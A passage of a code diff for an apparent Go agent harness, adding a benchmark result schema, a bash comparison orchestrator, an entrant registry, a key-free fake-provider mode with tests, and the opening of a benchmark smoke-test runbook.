+      "description": "Tenant scoping key if set. Source: Run.TenantID."
+    },
+    "conversation_id": {
+      "type": "string",
+      "description": "Conversation continuity key if set. Source: Run.ConversationID."
+    },
+    "agent_id": {
+      "type": "string",
+      "description": "Agent identifier if set. Source: Run.AgentID."
+    },
+    "created_at": {
+      "type": "string",
+      "format": "date-time",
+      "description": "UTC timestamp when the run was created. Source: Run.CreatedAt."
+    },
+    "updated_at": {
+      "type": "string",
+      "format": "date-time",
+      "description": "UTC timestamp of the last run state change. Source: Run.UpdatedAt."
+    },
+    "duration_ms": {
+      "type": "integer",
+      "description": "DERIVED: Run.UpdatedAt.Sub(Run.CreatedAt).Milliseconds(). Not a raw API field."
+    },
+    "rollout_path": {
+      "type": "string",
+      "description": "RECONSTRUCTED: <rolloutDir>/<YYYY-MM-DD>/<run_id>.jsonl from Run.CreatedAt UTC. Empty when rolloutDir is unknown. Never guessed."
+    },
+    "tool_calls": {
+      "type": "array",
+      "description": "Ordered list of tool invocations. Source: RunSummary.ToolCalls.",
+      "items": {
+        "type": "object",
+        "required": ["tool_name", "step"],
+        "properties": {
+          "tool_name": {
+            "type": "string",
+            "description": "Registered name of the tool called. Source: ToolCallSummary.ToolName."
+          },
+          "step": {
+            "type": "integer",
+            "minimum": 1,
+            "description": "LLM turn number during which the tool was called (1-indexed). Source: ToolCallSummary.Step."
+          }
+        },
+        "additionalProperties": false
+      }
+    },
+    "drift": {
+      "type": "object",
+      "description": "EXTERNAL/opt-in. Populated by an external drift-analysis oracle AFTER the run. Never derived from harness data.",
+      "properties": {
+        "baseline_run_id": {
+          "type": "string",
+          "description": "EXTERNAL: Run ID of the reference run being compared against."
+        },
+        "output_similarity": {
+          "type": "number",
+          "minimum": 0,
+          "maximum": 1,
+          "description": "EXTERNAL: [0,1] similarity score vs. baseline output."
+        },
+        "drift_flags": {
+          "type": "array",
+          "items": { "type": "string" },
+          "description": "EXTERNAL: Free-text flags describing detected differences."
+        }
+      },
+      "additionalProperties": false
+    },
+    "forensic_events": {
+      "type": "array",
+      "items": { "type": "object" },
+      "description": "EXTERNAL/opt-in. Raw forensic event payloads from the rollout JSONL. Populated by an external loader, never by the adapter."
+    },
+    "is_resolved": {
+      "type": "boolean",
+      "description": "EXTERNAL: task pass/fail as determined by the pytest oracle (terminal-bench or equivalent). This field is NOT produced by the harness adapter — it must be merged in by the benchmark runner from the oracle's results. Never fake this field."
+    },
+    "git_sha": {
+      "type": "string",
+      "description": "Optional: git SHA of this repo at the time of the run. Recorded for reproducibility by the adapter when available."
+    }
+  },
+  "additionalProperties": false
+}

--- a/benchmarks/comparison/run.sh
+++ b/benchmarks/comparison/run.sh
@@ -1,0 +1,337 @@
+#!/usr/bin/env bash
+# benchmarks/comparison/run.sh — Env-driven orchestrator for the comparison harness.
+#
+# Runs each ACTIVE entrant in tools.json against each task in TASK_SET_DIR,
+# captures one result record per (tool, task) pair, and writes a run report.
+#
+# HONESTY NOTICE: This harness records what the tools actually produce — it
+# does NOT compute head-to-head comparisons or accuracy numbers. is_resolved
+# (task pass/fail) is an EXTERNAL field from the pytest oracle; it is not
+# available here and is left absent in the raw records. If you want pass/fail
+# numbers, merge the oracle results into the raw JSONL after the run.
+# No comparison numbers are asserted by this script.
+#
+# ---------------------------------------------------------------------------
+# Usage
+# ---------------------------------------------------------------------------
+#
+#   TASK_SET_DIR=/path/to/tasks MODEL=gpt-4.1-mini ./run.sh
+#
+#   Or with fake provider (key-free smoke):
+#
+#   TASK_SET_DIR=/path/to/tasks \
+#   MODEL=fake-model \
+#   HARNESS_PROVIDER=fake \
+#   HARNESS_FAKE_TURNS=/path/to/turns.json \
+#   ./run.sh
+#
+# ---------------------------------------------------------------------------
+# Required environment
+# ---------------------------------------------------------------------------
+#
+#   TASK_SET_DIR    Absolute path to a directory of task directories.
+#                   Each subdirectory is one task; its name is the TASK_ID.
+#                   Each task directory must contain a "prompt.txt" or
+#                   "task.md" file with the agent prompt.
+#
+#   MODEL           Model name passed to every adapter (e.g. "gpt-4.1-mini").
+#
+# ---------------------------------------------------------------------------
+# Optional environment
+# ---------------------------------------------------------------------------
+#
+#   ENTRANT_IDS     Space-separated list of entrant IDs to run (default: all
+#                   active entrants in tools.json).
+#                   Example: ENTRANT_IDS="go-code"
+#
+#   OUTPUT_DIR      Directory for results and report (default:
+#                   .tmp/comparison/<timestamp>).
+#
+#   HARNESS_PROVIDER  Pass through to adapters (e.g. "fake" for key-free mode).
+#   HARNESS_FAKE_TURNS  Pass through to go-code adapter for fake provider.
+#   HARNESS_BINARY  Path to harnessd binary (default: harnessd on PATH).
+#   HARNESS_ADDR    Harnessd listen address (default: :8081).
+#
+#   POLL_TIMEOUT_S  Per-run poll timeout in seconds (default: 300).
+#
+# ---------------------------------------------------------------------------
+# Outputs
+# ---------------------------------------------------------------------------
+#
+#   $OUTPUT_DIR/results.jsonl   — one JSON record per (tool, task) pair.
+#   $OUTPUT_DIR/report.txt      — human-readable summary (counts only; no
+#                                  head-to-head numbers or accuracy claims).
+#   $OUTPUT_DIR/run-env.json    — captured run configuration for provenance.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+# ---------------------------------------------------------------------------
+# Validate required env
+# ---------------------------------------------------------------------------
+: "${TASK_SET_DIR:?TASK_SET_DIR must point to a directory of task subdirectories}"
+: "${MODEL:?MODEL must be set (e.g. gpt-4.1-mini or fake-model)}"
+
+if [[ ! -d "${TASK_SET_DIR}" ]]; then
+  echo "[comparison] ERROR: TASK_SET_DIR does not exist: ${TASK_SET_DIR}" >&2
+  exit 1
+fi
+
+# ---------------------------------------------------------------------------
+# Configuration
+# ---------------------------------------------------------------------------
+TIMESTAMP="$(date +%Y%m%dT%H%M%S)"
+OUTPUT_DIR="${OUTPUT_DIR:-.tmp/comparison/${TIMESTAMP}}"
+TOOLS_JSON="${SCRIPT_DIR}/tools.json"
+POLL_TIMEOUT_S="${POLL_TIMEOUT_S:-300}"
+
+mkdir -p "${OUTPUT_DIR}"
+
+RESULTS_JSONL="${OUTPUT_DIR}/results.jsonl"
+REPORT_TXT="${OUTPUT_DIR}/report.txt"
+RUN_ENV_JSON="${OUTPUT_DIR}/run-env.json"
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+info()  { printf '[comparison] %s\n' "$*"; }
+warn()  { printf '[comparison] WARN: %s\n' "$*" >&2; }
+
+# ---------------------------------------------------------------------------
+# Resolve active entrants
+# ---------------------------------------------------------------------------
+if ! command -v python3 &>/dev/null; then
+  echo "[comparison] ERROR: python3 is required to parse tools.json" >&2
+  exit 1
+fi
+
+ALL_ENTRANT_IDS="$(python3 - "${TOOLS_JSON}" <<'PYEOF'
+import json, sys
+data = json.load(open(sys.argv[1]))
+for e in data.get("entrants", []):
+    print(e["id"])
+PYEOF
+)"
+
+if [[ -z "${ALL_ENTRANT_IDS}" ]]; then
+  echo "[comparison] ERROR: no active entrants found in ${TOOLS_JSON}" >&2
+  exit 1
+fi
+
+# Filter to ENTRANT_IDS if set
+if [[ -n "${ENTRANT_IDS:-}" ]]; then
+  ACTIVE_ENTRANT_IDS=""
+  for id in ${ENTRANT_IDS}; do
+    if echo "${ALL_ENTRANT_IDS}" | grep -qx "${id}"; then
+      ACTIVE_ENTRANT_IDS="${ACTIVE_ENTRANT_IDS} ${id}"
+    else
+      warn "entrant '${id}' not found in active entrants; skipping"
+    fi
+  done
+  ACTIVE_ENTRANT_IDS="${ACTIVE_ENTRANT_IDS# }"
+else
+  ACTIVE_ENTRANT_IDS="${ALL_ENTRANT_IDS}"
+fi
+
+if [[ -z "${ACTIVE_ENTRANT_IDS}" ]]; then
+  echo "[comparison] ERROR: no entrants to run" >&2
+  exit 1
+fi
+
+info "active entrants: ${ACTIVE_ENTRANT_IDS}"
+
+# ---------------------------------------------------------------------------
+# Resolve tasks
+# ---------------------------------------------------------------------------
+TASK_IDS=()
+for task_dir in "${TASK_SET_DIR}"/*/; do
+  if [[ -d "${task_dir}" ]]; then
+    TASK_IDS+=("$(basename "${task_dir%/}")")
+  fi
+done
+
+if [[ ${#TASK_IDS[@]} -eq 0 ]]; then
+  echo "[comparison] ERROR: no task subdirectories found in TASK_SET_DIR: ${TASK_SET_DIR}" >&2
+  exit 1
+fi
+
+info "tasks (${#TASK_IDS[@]}): ${TASK_IDS[*]}"
+
+# ---------------------------------------------------------------------------
+# Write run-env provenance record
+# ---------------------------------------------------------------------------
+python3 - "${RUN_ENV_JSON}" <<PYEOF
+import json, sys, os, subprocess, datetime
+
+sha = ""
+try:
+    sha = subprocess.check_output(
+        ["git", "-C", "${SCRIPT_DIR}", "rev-parse", "--short", "HEAD"],
+        stderr=subprocess.DEVNULL, text=True
+    ).strip()
+except Exception:
+    pass
+
+env = {
+    "timestamp":      "${TIMESTAMP}",
+    "model":          "${MODEL}",
+    "task_set_dir":   "${TASK_SET_DIR}",
+    "active_entrants": "${ACTIVE_ENTRANT_IDS}".split(),
+    "task_ids":       "${TASK_IDS[*]}".split(),
+    "harness_provider": os.environ.get("HARNESS_PROVIDER", ""),
+    "git_sha":        sha,
+    "honesty_notice": (
+        "is_resolved (task pass/fail) is EXTERNAL — merge oracle results after the run. "
+        "No head-to-head accuracy claims are made by this script."
+    ),
+}
+with open(sys.argv[1], "w") as f:
+    json.dump(env, f, indent=2)
+    f.write("\n")
+PYEOF
+info "run-env written: ${RUN_ENV_JSON}"
+
+# ---------------------------------------------------------------------------
+# Run loop: for each entrant × task
+# ---------------------------------------------------------------------------
+PASS_COUNT=0
+FAIL_COUNT=0
+SKIP_COUNT=0
+RUN_COUNT=0
+
+for ENTRANT_ID in ${ACTIVE_ENTRANT_IDS}; do
+  # Resolve adapter path from tools.json
+  ADAPTER_REL="$(python3 - "${TOOLS_JSON}" "${ENTRANT_ID}" <<'PYEOF'
+import json, sys
+data = json.load(open(sys.argv[1]))
+for e in data.get("entrants", []):
+    if e["id"] == sys.argv[2]:
+        print(e["adapter"])
+        sys.exit(0)
+print("")
+PYEOF
+  )"
+
+  if [[ -z "${ADAPTER_REL}" ]]; then
+    warn "no adapter found for entrant '${ENTRANT_ID}'; skipping"
+    continue
+  fi
+
+  ADAPTER="${SCRIPT_DIR}/${ADAPTER_REL}"
+  if [[ ! -x "${ADAPTER}" ]]; then
+    warn "adapter not executable: ${ADAPTER}; skipping entrant '${ENTRANT_ID}'"
+    SKIP_COUNT=$(( SKIP_COUNT + ${#TASK_IDS[@]} ))
+    continue
+  fi
+
+  for TASK_ID in "${TASK_IDS[@]}"; do
+    TASK_DIR="${TASK_SET_DIR}/${TASK_ID}"
+    RUN_COUNT=$(( RUN_COUNT + 1 ))
+
+    # Read prompt from task directory
+    PROMPT=""
+    if [[ -f "${TASK_DIR}/prompt.txt" ]]; then
+      PROMPT="$(cat "${TASK_DIR}/prompt.txt")"
+    elif [[ -f "${TASK_DIR}/task.md" ]]; then
+      PROMPT="$(cat "${TASK_DIR}/task.md")"
+    else
+      warn "no prompt.txt or task.md in ${TASK_DIR}; skipping"
+      SKIP_COUNT=$(( SKIP_COUNT + 1 ))
+      continue
+    fi
+
+    # Per-run scratch workspace
+    WORKSPACE="${OUTPUT_DIR}/workspace/${ENTRANT_ID}/${TASK_ID}"
+    mkdir -p "${WORKSPACE}"
+
+    # Per-run result file
+    RESULT_JSON="${OUTPUT_DIR}/workspace/${ENTRANT_ID}/${TASK_ID}/result.json"
+
+    info "running: entrant=${ENTRANT_ID} task=${TASK_ID}"
+
+    # Run adapter; record infra failures as synthetic error records
+    ADAPTER_EXIT=0
+    TASK_DIR="${TASK_DIR}" \
+    WORKSPACE="${WORKSPACE}" \
+    PROMPT="${PROMPT}" \
+    MODEL="${MODEL}" \
+    RESULT_JSON="${RESULT_JSON}" \
+    TASK_ID="${TASK_ID}" \
+    TOOL_ID="${ENTRANT_ID}" \
+    POLL_TIMEOUT_S="${POLL_TIMEOUT_S}" \
+    HARNESS_PROVIDER="${HARNESS_PROVIDER:-}" \
+    HARNESS_FAKE_TURNS="${HARNESS_FAKE_TURNS:-}" \
+    HARNESS_BINARY="${HARNESS_BINARY:-harnessd}" \
+    HARNESS_ADDR="${HARNESS_ADDR:-:8081}" \
+      bash "${ADAPTER}" || ADAPTER_EXIT=$?
+
+    if [[ ${ADAPTER_EXIT} -ne 0 ]] || [[ ! -f "${RESULT_JSON}" ]]; then
+      warn "adapter failed (exit=${ADAPTER_EXIT}) for ${ENTRANT_ID}/${TASK_ID}; writing synthetic error record"
+      python3 - "${RESULT_JSON}" <<PYEOF
+import json, sys, datetime
+record = {
+    "tool_id":                  "${ENTRANT_ID}",
+    "task_id":                  "${TASK_ID}",
+    "run_id":                   "adapter-infra-error",
+    "status":                   "failed",
+    "steps_taken":              0,
+    "total_prompt_tokens":      0,
+    "total_completion_tokens":  0,
+    "total_cost_usd":           0.0,
+    "cost_status":              "provider_unreported",
+    "cache_hit_rate":           0.0,
+    "model":                    "${MODEL}",
+    "prompt":                   "",
+    "created_at":               datetime.datetime.now(datetime.timezone.utc).isoformat(),
+    "updated_at":               datetime.datetime.now(datetime.timezone.utc).isoformat(),
+    "duration_ms":              0,
+    "tool_calls":               [],
+    "error_message":            "adapter infrastructure error (exit=${ADAPTER_EXIT})",
+}
+with open(sys.argv[1], "w") as f:
+    json.dump(record, f, indent=2)
+    f.write("\n")
+PYEOF
+      FAIL_COUNT=$(( FAIL_COUNT + 1 ))
+    else
+      PASS_COUNT=$(( PASS_COUNT + 1 ))
+    fi
+
+    # Append result to JSONL
+    cat "${RESULT_JSON}" >> "${RESULTS_JSONL}"
+
+  done  # tasks
+done    # entrants
+
+# ---------------------------------------------------------------------------
+# Write report
+# ---------------------------------------------------------------------------
+{
+  echo "=============================="
+  echo " Comparison Harness Run Report"
+  echo "=============================="
+  echo " Timestamp : ${TIMESTAMP}"
+  echo " Model     : ${MODEL}"
+  echo " Task set  : ${TASK_SET_DIR}"
+  echo " Entrants  : ${ACTIVE_ENTRANT_IDS}"
+  echo " Tasks     : ${TASK_IDS[*]}"
+  echo ""
+  echo " Runs attempted : ${RUN_COUNT}"
+  echo " Adapters OK    : ${PASS_COUNT}"
+  echo " Adapter errors : ${FAIL_COUNT}"
+  echo " Skipped        : ${SKIP_COUNT}"
+  echo ""
+  echo " Results JSONL  : ${RESULTS_JSONL}"
+  echo " Provenance     : ${RUN_ENV_JSON}"
+  echo ""
+  echo "HONESTY NOTICE:"
+  echo "  is_resolved (task pass/fail) is EXTERNAL — it must come from the"
+  echo "  pytest oracle (terminal-bench or equivalent), not from this script."
+  echo "  No head-to-head accuracy comparisons are asserted here."
+  echo "  To get pass/fail numbers, merge oracle results into ${RESULTS_JSONL}."
+  echo "=============================="
+} | tee "${REPORT_TXT}"
+
+info "report written: ${REPORT_TXT}"
+info "done."

--- a/benchmarks/comparison/tools.json
+++ b/benchmarks/comparison/tools.json
@@ -1,0 +1,37 @@
+{
+  "schema_version": "1",
+  "description": "Entrant registry for the go-code comparison harness. Only go-code is fully specified here. All other entrants are COMMENTED stubs — fill them in when you actually run a comparison.",
+  "entrants": [
+    {
+      "id": "go-code",
+      "display_name": "go-code (this harness)",
+      "adapter": "adapters/go-code.sh",
+      "description": "go-agent-harness: POST /v1/runs → poll GET /v1/runs/{id} → GET /v1/runs/{id}/summary. Key-free when HARNESS_PROVIDER=fake.",
+      "requires_key": false,
+      "key_env": "OPENAI_API_KEY",
+      "notes": "Set HARNESS_PROVIDER=fake + HARNESS_FAKE_TURNS for key-free deterministic runs. Set HARNESS_BINARY to override harnessd path (default: harnessd on PATH)."
+    }
+  ],
+  "_stub_entrants_not_active": [
+    {
+      "_comment": "STUB — not built, not run. Fill in when you add this entrant.",
+      "id": "entrant-b",
+      "display_name": "TBD",
+      "adapter": "adapters/entrant-b.sh",
+      "description": "TBD — adapter not written; entrant not configured.",
+      "requires_key": true,
+      "key_env": "TBD_API_KEY",
+      "notes": "Operator must write adapters/entrant-b.sh following the contract in adapters/template.sh, then move this entry into the active 'entrants' array."
+    },
+    {
+      "_comment": "STUB — not built, not run. Fill in when you add this entrant.",
+      "id": "entrant-c",
+      "display_name": "TBD",
+      "adapter": "adapters/entrant-c.sh",
+      "description": "TBD — adapter not written; entrant not configured.",
+      "requires_key": true,
+      "key_env": "TBD_API_KEY",
+      "notes": "Operator must write adapters/entrant-c.sh following the contract in adapters/template.sh, then move this entry into the active 'entrants' array."
+    }
+  ]
+}

--- a/cmd/harnessd/bootstrap_helpers.go
+++ b/cmd/harnessd/bootstrap_helpers.go
@@ -341,6 +341,7 @@ type serverBootstrapOptions struct {
 	providerRegistry *catalog.ProviderRegistry
 	runStore         istore.Store
 	triggers         triggerRuntime
+	rolloutDir       string
 }
 
 func buildServerOptions(opts serverBootstrapOptions) server.ServerOptions {
@@ -361,5 +362,6 @@ func buildServerOptions(opts serverBootstrapOptions) server.ServerOptions {
 		GitHubAdapter:    opts.triggers.github,
 		SlackAdapter:     opts.triggers.slack,
 		LinearAdapter:    opts.triggers.linear,
+		RolloutDir:       opts.rolloutDir,
 	}
 }

--- a/cmd/harnessd/main.go
+++ b/cmd/harnessd/main.go
@@ -16,10 +16,13 @@ import (
 	"syscall"
 	"time"
 
+	"encoding/json"
+
 	"github.com/google/uuid"
 	"go-agent-harness/internal/checkpoints"
 	"go-agent-harness/internal/config"
 	"go-agent-harness/internal/cron"
+	"go-agent-harness/internal/fakeprovider"
 	"go-agent-harness/internal/harness"
 	htools "go-agent-harness/internal/harness/tools"
 	"go-agent-harness/internal/mcp"
@@ -48,7 +51,7 @@ type callbackRunStarter struct {
 	runner *harness.Runner
 }
 
-func (a *callbackRunStarter) StartRun(prompt, conversationID string) error {
+func (a *callbackRunStarter) StartRun(prompt, conversationID, tenantID, agentID string) error {
 	a.mu.Lock()
 	r := a.runner
 	a.mu.Unlock()
@@ -58,6 +61,8 @@ func (a *callbackRunStarter) StartRun(prompt, conversationID string) error {
 	_, err := r.StartRun(harness.RunRequest{
 		Prompt:         prompt,
 		ConversationID: conversationID,
+		TenantID:       tenantID,
+		AgentID:        agentID,
 	})
 	return err
 }
@@ -571,10 +576,16 @@ func runWithSignalsWithDeps(sig <-chan os.Signal, getenv func(string) string, ne
 
 	// Delayed callbacks
 	var callbackStarter *callbackRunStarter
+	var callbackBridge *harness.CallbackEventBridge
 	var callbackMgr *htools.CallbackManager
 	if callbacksEnabled {
 		callbackStarter = &callbackRunStarter{}
-		callbackMgr = htools.NewCallbackManager(callbackStarter)
+		// The bridge forwards callback lifecycle events onto the originating
+		// run's SSE stream. It is bound to the Runner lazily (see
+		// buildHTTPRuntime), mirroring callbackStarter, because the manager is
+		// constructed before the Runner exists.
+		callbackBridge = harness.NewCallbackEventBridge()
+		callbackMgr = htools.NewCallbackManager(callbackStarter, htools.WithEventSink(callbackBridge))
 		log.Printf("delayed callbacks enabled")
 	}
 
@@ -797,6 +808,7 @@ func runWithSignalsWithDeps(sig <-chan os.Signal, getenv func(string) string, ne
 		runStore:             runStore,
 		triggers:             triggerRuntime,
 		callbackStarter:      callbackStarter,
+		callbackBridge:       callbackBridge,
 		msgSummarizer:        msgSummarizer,
 		skillManager:         skillManager,
 		subagentBaseRef:      subagentBaseRef,
@@ -885,9 +897,73 @@ type resolveDefaultProviderOptions struct {
 //     use that provider so startup behavior matches the selected model.
 //  2. Else if OPENAI_API_KEY is set, keep the legacy OpenAI path.
 //  3. Else return a clear error describing the missing model/provider config.
+//
+// fakeProviderTurnJSON is the on-disk JSON shape for a single scripted turn.
+// It maps to fakeprovider.Turn.  Fields match the plan-defined schema:
+//
+//	{content, tool_calls?, usage{prompt,completion}?, cost_usd?, cost_status?}
+//
+// Note: usage uses short keys (prompt/completion) rather than the longer
+// CompletionUsage field names to keep the shell-smoke file concise.
+type fakeProviderTurnJSON struct {
+	Content    string                 `json:"content"`
+	ToolCalls  []harness.ToolCall     `json:"tool_calls,omitempty"`
+	Usage      *fakeProviderUsageJSON `json:"usage,omitempty"`
+	CostUSD    *float64               `json:"cost_usd,omitempty"`
+	CostStatus harness.CostStatus     `json:"cost_status,omitempty"`
+}
+
+type fakeProviderUsageJSON struct {
+	Prompt     int `json:"prompt"`
+	Completion int `json:"completion"`
+}
+
+// loadFakeTurns reads a JSON turns file and converts it to []fakeprovider.Turn.
+func loadFakeTurns(path string) ([]fakeprovider.Turn, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return nil, fmt.Errorf("read fake turns file %q: %w", path, err)
+	}
+	var raw []fakeProviderTurnJSON
+	if err := json.Unmarshal(data, &raw); err != nil {
+		return nil, fmt.Errorf("parse fake turns file %q: %w", path, err)
+	}
+	turns := make([]fakeprovider.Turn, len(raw))
+	for i, r := range raw {
+		t := fakeprovider.Turn{
+			Content:    r.Content,
+			ToolCalls:  r.ToolCalls,
+			CostUSD:    r.CostUSD,
+			CostStatus: r.CostStatus,
+		}
+		if r.Usage != nil {
+			total := r.Usage.Prompt + r.Usage.Completion
+			t.Usage = &harness.CompletionUsage{
+				PromptTokens:     r.Usage.Prompt,
+				CompletionTokens: r.Usage.Completion,
+				TotalTokens:      total,
+			}
+		}
+		turns[i] = t
+	}
+	return turns, nil
+}
+
 func resolveDefaultProvider(opts resolveDefaultProviderOptions) (harness.Provider, error) {
 	if opts.getenv == nil {
 		opts.getenv = os.Getenv
+	}
+
+	// Path 0: env-gated fake provider for key-free deterministic shell smoke.
+	// Activated only when HARNESS_PROVIDER=="fake"; default behavior is
+	// unchanged when the env var is absent.
+	if strings.TrimSpace(opts.getenv("HARNESS_PROVIDER")) == "fake" {
+		turnsPath := strings.TrimSpace(opts.getenv("HARNESS_FAKE_TURNS"))
+		turns, err := loadFakeTurns(turnsPath)
+		if err != nil {
+			return nil, fmt.Errorf("fake provider: %w", err)
+		}
+		return fakeprovider.New(turns), nil
 	}
 
 	model := strings.TrimSpace(opts.model)

--- a/cmd/harnessd/main_test.go
+++ b/cmd/harnessd/main_test.go
@@ -18,6 +18,7 @@ import (
 
 	"go-agent-harness/internal/config"
 	"go-agent-harness/internal/cron"
+	"go-agent-harness/internal/fakeprovider"
 	"go-agent-harness/internal/harness"
 	htools "go-agent-harness/internal/harness/tools"
 	om "go-agent-harness/internal/observationalmemory"
@@ -327,6 +328,141 @@ func TestResolveDefaultProviderUsesOpenRouterForDynamicSlashModel(t *testing.T) 
 	if !ok || named.name != "openrouter" {
 		t.Fatalf("unexpected provider: %#v", provider)
 	}
+}
+
+// TestResolveDefaultProvider_FakePath covers Path 0: when HARNESS_PROVIDER=="fake",
+// resolveDefaultProvider must return a *fakeprovider.Provider scripted from the
+// turns JSON file named by HARNESS_FAKE_TURNS.  When HARNESS_PROVIDER is absent
+// the existing (OpenAI/registry) path must be untouched.
+func TestResolveDefaultProvider_FakePath(t *testing.T) {
+	t.Parallel()
+
+	t.Run("fake provider loaded from turns file", func(t *testing.T) {
+		t.Parallel()
+
+		// Write a minimal turns JSON: one turn with content, usage, cost_usd, cost_status.
+		turnsJSON := `[
+			{
+				"content": "hello from fake",
+				"usage": {"prompt": 10, "completion": 5},
+				"cost_usd": 0.001,
+				"cost_status": "available"
+			}
+		]`
+		turnsFile := filepath.Join(t.TempDir(), "turns.json")
+		if err := os.WriteFile(turnsFile, []byte(turnsJSON), 0o644); err != nil {
+			t.Fatalf("write turns file: %v", err)
+		}
+
+		openAICalled := false
+		provider, err := resolveDefaultProvider(resolveDefaultProviderOptions{
+			getenv: func(key string) string {
+				switch key {
+				case "HARNESS_PROVIDER":
+					return "fake"
+				case "HARNESS_FAKE_TURNS":
+					return turnsFile
+				default:
+					return ""
+				}
+			},
+			newProvider: func(cfg openai.Config) (harness.Provider, error) {
+				openAICalled = true
+				return &namedProvider{name: "openai"}, nil
+			},
+		})
+		if err != nil {
+			t.Fatalf("resolveDefaultProvider: %v", err)
+		}
+		if openAICalled {
+			t.Fatal("OpenAI provider factory must not be called when HARNESS_PROVIDER=fake")
+		}
+
+		fp, ok := provider.(*fakeprovider.Provider)
+		if !ok {
+			t.Fatalf("expected *fakeprovider.Provider, got %T", provider)
+		}
+
+		// Confirm the scripted turn is served correctly.
+		result, err := fp.Complete(context.Background(), harness.CompletionRequest{
+			Messages: []harness.Message{{Role: "user", Content: "ping"}},
+		})
+		if err != nil {
+			t.Fatalf("Complete: %v", err)
+		}
+		if result.Content != "hello from fake" {
+			t.Fatalf("Content: got %q, want %q", result.Content, "hello from fake")
+		}
+		if result.Usage == nil {
+			t.Fatal("Usage must not be nil")
+		}
+		if result.Usage.PromptTokens != 10 {
+			t.Fatalf("Usage.PromptTokens: got %d, want 10", result.Usage.PromptTokens)
+		}
+		if result.Usage.CompletionTokens != 5 {
+			t.Fatalf("Usage.CompletionTokens: got %d, want 5", result.Usage.CompletionTokens)
+		}
+		if result.CostUSD == nil || *result.CostUSD != 0.001 {
+			t.Fatalf("CostUSD: got %v, want 0.001", result.CostUSD)
+		}
+		if result.CostStatus != harness.CostStatusAvailable {
+			t.Fatalf("CostStatus: got %q, want %q", result.CostStatus, harness.CostStatusAvailable)
+		}
+	})
+
+	t.Run("missing turns file returns error", func(t *testing.T) {
+		t.Parallel()
+
+		_, err := resolveDefaultProvider(resolveDefaultProviderOptions{
+			getenv: func(key string) string {
+				switch key {
+				case "HARNESS_PROVIDER":
+					return "fake"
+				case "HARNESS_FAKE_TURNS":
+					return "/nonexistent/path/turns.json"
+				default:
+					return ""
+				}
+			},
+			newProvider: func(cfg openai.Config) (harness.Provider, error) {
+				return &namedProvider{name: "openai"}, nil
+			},
+		})
+		if err == nil {
+			t.Fatal("expected error when turns file does not exist")
+		}
+	})
+
+	t.Run("HARNESS_PROVIDER unset leaves existing path untouched", func(t *testing.T) {
+		t.Parallel()
+
+		openAICalled := false
+		provider, err := resolveDefaultProvider(resolveDefaultProviderOptions{
+			getenv: func(key string) string {
+				switch key {
+				case "OPENAI_API_KEY":
+					return "test-key"
+				default:
+					return "" // HARNESS_PROVIDER not set
+				}
+			},
+			newProvider: func(cfg openai.Config) (harness.Provider, error) {
+				openAICalled = true
+				return &namedProvider{name: "openai"}, nil
+			},
+			model: "gpt-4.1-mini",
+		})
+		if err != nil {
+			t.Fatalf("resolveDefaultProvider: %v", err)
+		}
+		if !openAICalled {
+			t.Fatal("expected OpenAI provider factory to be called when HARNESS_PROVIDER is unset")
+		}
+		named, ok := provider.(*namedProvider)
+		if !ok || named.name != "openai" {
+			t.Fatalf("expected namedProvider{openai}, got %T %#v", provider, provider)
+		}
+	})
 }
 
 func TestLoadStartupProfileFallsBackToBuiltInProfile(t *testing.T) {
@@ -1879,7 +2015,7 @@ func TestCallbackRunStarterNilRunner(t *testing.T) {
 	t.Parallel()
 
 	starter := &callbackRunStarter{}
-	err := starter.StartRun("hello", "conv-1")
+	err := starter.StartRun("hello", "conv-1", "tenant-a", "agent-a")
 	if err == nil {
 		t.Fatalf("expected error when runner is nil")
 	}
@@ -1904,7 +2040,7 @@ func TestCallbackRunStarterWithRunner(t *testing.T) {
 	starter.runner = runner
 	starter.mu.Unlock()
 
-	err := starter.StartRun("do something", "")
+	err := starter.StartRun("do something", "", "", "")
 	if err != nil {
 		t.Fatalf("StartRun: %v", err)
 	}

--- a/cmd/harnessd/runtime_container.go
+++ b/cmd/harnessd/runtime_container.go
@@ -69,6 +69,7 @@ type httpRuntimeOptions struct {
 	runStore             istore.Store
 	triggers             triggerRuntime
 	callbackStarter      *callbackRunStarter
+	callbackBridge       *harness.CallbackEventBridge
 	msgSummarizer        *lazySummarizer
 	skillManager         server.SkillManager
 	subagentBaseRef      string
@@ -122,6 +123,10 @@ func buildHTTPRuntime(opts httpRuntimeOptions) (httpRuntime, error) {
 		opts.callbackStarter.mu.Unlock()
 	}
 
+	if opts.callbackBridge != nil {
+		opts.callbackBridge.BindRunner(runner)
+	}
+
 	if opts.msgSummarizer != nil {
 		opts.msgSummarizer.mu.Lock()
 		opts.msgSummarizer.summarizer = runner.NewMessageSummarizer()
@@ -141,6 +146,7 @@ func buildHTTPRuntime(opts httpRuntimeOptions) (httpRuntime, error) {
 		providerRegistry: opts.providerRegistry,
 		runStore:         opts.runStore,
 		triggers:         opts.triggers,
+		rolloutDir:       opts.runnerCfg.RolloutDir,
 	}))
 
 	// Mount the MCP server at /mcp so external MCP clients can drive the harness.

--- a/docs/runbooks/INDEX.md
+++ b/docs/runbooks/INDEX.md
@@ -18,3 +18,4 @@
 - `profile-authoring.md`: TOML schema reference, resolution tiers, built-in profile catalog, and step-by-step guide for creating and validating custom profiles.
 - `profile-operations.md`: How to choose, start with, and operate profiles — recommendation tool, run request field, API lifecycle management, and efficiency reports.
 - `subagent-debugging.md`: How to find a child run's ID, read its status and events, interpret ChildResult, and diagnose common failures (profile not found, tool not allowed, max_steps exceeded, cost limit, workspace provision).
+- `benchmark-smoke.md`: Key-free deterministic smokes (in-process Go test + shell script), the grounded result schema (`internal/benchresult`), the comparison-harness shape (`benchmarks/comparison/`), and the real Python benchmark paths with their deps and honesty caveats.

--- a/docs/runbooks/benchmark-smoke.md
+++ b/docs/runbooks/benchmark-smoke.md
@@ -1,0 +1,306 @@
+# Benchmark Smoke Runbook
+
+This runbook covers the two deterministic, key-free smokes for the harness benchmark infrastructure,
+the grounded result schema, the comparison-harness shape, and the real Python benchmark paths that
+require external dependencies and API keys.
+
+---
+
+## 1. In-process Go smoke
+
+**Command:**
+
+```bash
+go test ./internal/server/... -run TestRunSmoke
+```
+
+With race detector (recommended before committing):
+
+```bash
+go test ./internal/server/... -race -count=1 -run TestRunSmoke
+```
+
+**What it proves:**
+
+- The real run API (`POST /v1/runs` → poll `GET /v1/runs/{id}` → `GET /v1/runs/{id}/summary`) executes
